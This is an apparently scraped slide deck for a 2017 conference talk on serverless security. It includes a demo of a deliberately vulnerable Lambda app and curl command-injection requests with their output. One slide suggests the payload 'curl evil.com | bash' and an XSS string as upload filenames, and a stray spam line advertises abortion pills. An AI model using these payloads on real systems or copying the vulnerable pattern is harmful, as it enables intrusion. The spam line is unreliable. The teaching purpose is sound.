Talk given at O'Reilly's 2017 Velocity Conference in San Jose.
Serverless is the design pattern for writing applications at scale without the necessity of managing infrastructure. This is done across the continuum of the cloud—from storage as a service to database as a service—but the center of serverless is functions as a service (FaaS). (Current FaaS offerings include AWS Lambda, Azure Functions, and Google Cloud Functions.) Now processes run for milliseconds before being destroyed and then get instantiated for subsequent requests.
Serverless adds simplicity and a new economic model to cloud computing, but it creates some unique security challenges. In serverless architectures, technologies like antivirus and intrusion detection become meaningless. James Wickett explores practical security approaches for serverless in four key areas—the software supply chain, the delivery pipeline, data flow, and attack detection—and examines how traditional approaches need to be adapted to serverless.
Even if you don’t have any experience with serverless, don’t worry; this session starts with the basics. You’ll learn what serverless is (hint: it’s still being defined) and practical patterns for serverless adoption.
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
Serverless Security: A pragmatic primer for builders and defenders
1. Velocity San Jose 2017 @WICKETT
SERVERLESS SECURITY:
A PRAGMATIC PRIMER
FOR BUILDERS AND
DEFENDERS
JAMES WICKETT
2. Velocity San Jose 2017 @WICKETT
WANT THE SLIDES
RIGHT NOW?
Send an email to
james@signalsciences.com
3. Velocity San Jose 2017 @WICKETT
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ AUTHOR DEVOPS FUNDAMENTALS AT
LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND
LABS.SIGNALSCIENCES.COM
JAMES WICKETT
4. Velocity San Jose 2017 @WICKETT
Don’t worry, this is not a
thinly veiled vendor pitch.
5. Velocity San Jose 2017 @WICKETT
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY
UNITS, COUPLED WITH THIRD PARTY SERVICES THAT
ALLOW RUNNING END-TO-END APPLICATIONS
WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
6. Velocity San Jose 2017 @WICKETT
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
‣ SOFTWARE SUPPLY CHAIN SECURITY
‣ DELIVERY PIPELINE SECURITY
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE
PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
17. Velocity San Jose 2017 @WICKETT
‣ 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION
SERVICES RUN BY THIRD PARTIES
‣ LATE 2014 - AWS LAUNCHED LAMBDA
‣ JULY 2015 - AWS LAUNCHED API GATEWAY
‣ OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY
USING AWS LAMBDA
‣ 2015 TO PRESENT - FRAMEWORKS FORMING
‣ 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED
‣ 2016 - SERVERLESS CONFERENCES STARTED
HISTORY OF SERVERLESS
18. Velocity San Jose 2017 @WICKETT
VMsHardware Serverless
Inspiration from @adrianco
Waste
Value
19. Velocity San Jose 2017 @WICKETT
Decomposed
Microservice
Architecture
25. Velocity San Jose 2017 @WICKETT
SERVERLESS IS AN
OPINIONATED
FRAMEWORK FOR
COMPUTE AND
CONTAINERS
26. Velocity San Jose 2017 @WICKETT
If you want to lead your
company bravely into the new
world, you would do well to
focus lot on how serverless will
evolve.
- @Cloudopinion
https://medium.com/
@cloud_opinion/the-pattern-
may-repeat-26de1e8b489d
27. Velocity San Jose 2017 @WICKETT
THE CLOUD WAS TO
VIRTUALIZATION AS
SERVERLESS WILL BE TO
CONTAINERS
28. Velocity San Jose 2017 @WICKETT
Serverless encourages functions
as deploy units, coupled with
third party services that allow
running end-to-end applications
without worrying about system
operation.
SERVERLESS DEFINITION
42. Velocity San Jose 2017 @WICKETT
‣ APP NEEDS LARGE LOCAL DISK SPACE
‣ LONG RUNNING JOBS
‣ BIG I/O TASKS
‣ LATENCY SENSITIVE REQUESTS THAT CAN’T
WAIT FOR THE COLD-STARTUP TIME
SERVERLESS DEAL KILLERS (PROBABLY)
52. Velocity San Jose 2017 @WICKETT
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN
BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH
A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER
AWS SERVICES YOUR APP CONSUMES
GO SPARTA
53. Velocity San Jose 2017 @WICKETT
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS,
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
54. Velocity San Jose 2017 @WICKETT
‣ BUILD A WORD CLOUD GENERATOR
‣ ABLE TO CONSUME 3RD PARTY APIS FOR TEXT
SOURCES
‣ RETURN JSON WITH COUNTS OF WORDS IN
TEXT
‣ KEEP IT SIMPLE
STEP 2: IDEA!
55. Velocity San Jose 2017 @WICKETT
‣ (USING GO SPARTA FOR THE FRAMEWORK)
‣ LAMBDA
‣ S3
‣ API GATEWAY
STEP 3: DESIGN AND
ARCHITECTURE
74. Velocity San Jose 2017 @WICKETT
‣ SECURE SOFTWARE SUPPLY CHAIN
‣ DELIVERY PIPELINE
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
FOUR AREAS OF
SERVERLESS SECURITY
76. Velocity San Jose 2017 @WICKETT
‣ THE CODE YOU WRITE (AND LIBS) IS YOUR
SURFACE AREA NOW
‣ CHANGE FROM THE PAST (E.G. SHELLSHOCK,
HEARTBLEED) OF THE NUMEROUS FIREDRILLS
OUR INDUSTRY HAD TO ENDURE DUE TO
INHERITANCE
SURFACE AREA REDUCTION
77. Velocity San Jose 2017 @WICKETT
‣ TLS CONTROL TO THE PROVIDER
‣ ROUTING CONTROL TO THE PROVIDER
‣ CONSUMPTION OF THIRD PARTY SERVICES
‣ IAM ROLES AND POLICY CONFUSION
SURFACE AREA EXPANSION
83. Velocity San Jose 2017 @WICKETT
Lambda + s3 + kinesis +
DynamoDB +
cloudformation + API
Gateway + Auth0
SERVICE AND 3RD PARTY EXPANSION
84. Velocity San Jose 2017 @WICKETT
https://media.ccc.de/v/33c3-7865-
gone_in_60_milliseconds
IAM ROLES AND POLICIES
85. Velocity San Jose 2017 @WICKETT
Recommendation:
Use a third-party service
to monitor for provider
config changes
86. Velocity San Jose 2017 @WICKETT
‣ DISABLE ROOT ACCESS KEYS
‣ MANAGE USERS WITH PROFILES
‣ SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM
‣ SECURE KEYS IN DEV SYSTEM
‣ USE PROVIDER MFA
USE GOOD HYGIENE WITH
YOUR PROVIDER
91. Velocity San Jose 2017 @WICKETT
UNIT TESTING EVEN
MORE CRITICAL AS
INTEGRATION
TESTING IN DEV IS
HARDER
92. Velocity San Jose 2017 @WICKETT
‣ USE OF A STAGING OR PRE-PROD ENV
‣ END TO END SYNTHETIC INTEGRATION TESTS
‣ ALL THE USUAL SUSPECTS
INTEGRATION TESTING
94. Velocity San Jose 2017 @WICKETT
‣ ONLY DEV KEYS CAN PUSH TO ‘DEV’
‣ ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE-
PROD
‣ INTEGRATION TESTS MUST PASS IN THIS ENV
‣ SECURITY VALIDATION MUST TAKE PLACE BEFORE
PROMOTION
‣ ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM
GOOD PIPELINE PRACTICES
96. Velocity San Jose 2017 @WICKETT
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
GAUNTLT WORKSHOP IN 9 EXAMPLES
97. Velocity San Jose 2017 @WICKETT
DATA FLOW
‣ DEVELOPMENT
‣ DATA FLOW DIAGRAMS
‣ THREAT MODELING
‣ RUNTIME
‣ LOGGING
‣ CUSTOM MONITORS/
METRICS
98. Velocity San Jose 2017 @WICKETT
Your provider is responsible for
the underlying infrastructure
and services. You are
responsible for ensuring you use
the services in a secure manner.
https://read.acloud.guru/adopting-
serverless-architectures-and-
security-254a0c12b54a
99. Velocity San Jose 2017 @WICKETT
‣ SPOOFING CONSUMED RESOURCES
‣ DENIAL OF SERVICE
‣ TIMEOUTS
‣ EXECUTION RESTRICTIONS FOR RESOURCES
‣ CAPACITY ISSUES
DATA FLOW SECURITY
104. Velocity San Jose 2017 @WICKETT
APPSEC GREATEST HITS
(XSS, SQLI, CMDEXE) STILL
RELEVANT 15 YEARS
LATER!
105. Velocity San Jose 2017 @WICKETT
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO SEE MAKE THE POINT THAT APPSEC IS
RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS
GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
106. Velocity San Jose 2017 @WICKETT
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A
QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED
AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
github.com/wickett/lamback
107. Velocity San Jose 2017 @WICKETT
lambhack is a vulnerable
serverless lambda application
It would certainly be a bad idea
to base any coding patterns off
what you see here.
109. Velocity San Jose 2017 @WICKETT
BAD CODE IS BAD CODE
EVEN IN SERVERLESS…
command := lambdaEvent.QueryParams[“args"]
output := runner.Run(command)
110. Velocity San Jose 2017 @WICKETT
With command execution
available to us in
lambhack, we can poke
around the container a bit
111. Velocity San Jose 2017 @WICKETT
UNAME -A
$ curl “https://XXXX.execute-api.us-
east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;
+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1
SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64
GNU/Linux
112. Velocity San Jose 2017 @WICKETT
CAT /PROC/VERSION
$ curl “https://XXXX.execute-api.us-
east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/
version;+sleep+1”
> Linux version 4.4.35-33.55.amzn1.x86_64
(mockbuild@gobi-build-60006) (gcc version
4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1
SMP Tue Dec 6 20:30:04 UTC 2016
113. Velocity San Jose 2017 @WICKETT
LET’S LOOK IN /TMP
$ curl “https://XXXX.execute-api.us-
east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;
+sleep+1"
total
17916
drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 .
drwxr-xr-x 21 root root 4096 Feb 8 21:47 ..
-rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
114. Velocity San Jose 2017 @WICKETT
LAMBDA REUSE IN ACTION!
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/
prod/lambhack/c?args=ls+/tmp;+sleep+1"
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/
prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1”
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/
prod/lambhack/args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64
wickettfile
115. Velocity San Jose 2017 @WICKETT
WHICH CURL
$ curl “https://XXXX.execute-api.us-
east-1.amazonaws.com/prod/lambhack/c?
args=which+curl;+sleep+1"
> /usr/bin/curl
116. Velocity San Jose 2017 @WICKETT
‣ ADD XSS
‣ ADD OTHER INJECTION ATTACKS
‣ ADD AUTH VECTORS
‣ …
‣ PULL REQUESTS ACCEPTED :)
FUTURE OF LAMBHACK
117. Velocity San Jose 2017 @WICKETT
‣ LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO
‣ MONITORING/LOGGING PLAYS A KEY ROLE HERE
‣ DETECT LONGER RUN TIMES
‣ HIGHER ERROR RATE OCCURRENCES
‣ DATA INGESTION
‣ LOG ACTIONS OF LAMBDAS
APPSEC THOUGHTS
118. Velocity San Jose 2017 @WICKETT
APPLICATION SECURITY IS
STILL RELEVANT
119. Velocity San Jose 2017 @WICKETT
‣ New surface area, similar appsec problems
‣ Command Exec
‣ XSS
‣ Injection Attacks
‣ Try new things, e.g. appending ‘curl evil.com |
bash’ or <script>alert(1)</script> to a filename
you upload on s3
TYPES OF ATTACKS
120. Velocity San Jose 2017 @WICKETT
‣ LOGGING, EMITTING EVENTS
‣ USAGE METRICS
‣ VANDIUM (SQLI) WRAPPER
‣ CONTENT SECURITY POLICY (CSP)
‣ MORE THINGS NEED TO BE DONE HERE…
DEFENSE
121. Velocity San Jose 2017 @WICKETT
Development in serverless is
easier than ever, attracting new
developers to web development,
as a result, application security
will see a rise.
FINAL THOUGHT
123. Velocity San Jose 2017 @WICKETT
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY
UNITS, COUPLED WITH THIRD PARTY SERVICES THAT
ALLOW RUNNING END-TO-END APPLICATIONS
WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
124. Velocity San Jose 2017 @WICKETT
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
‣ SOFTWARE SUPPLY CHAIN SECURITY
‣ DELIVERY PIPELINE SECURITY
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE
PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
125. Velocity San Jose 2017 @WICKETT
WANT THE SLIDES RIGHT
NOW OR HAVE QUESTIONS?
Send an email to
james@signalsciences.com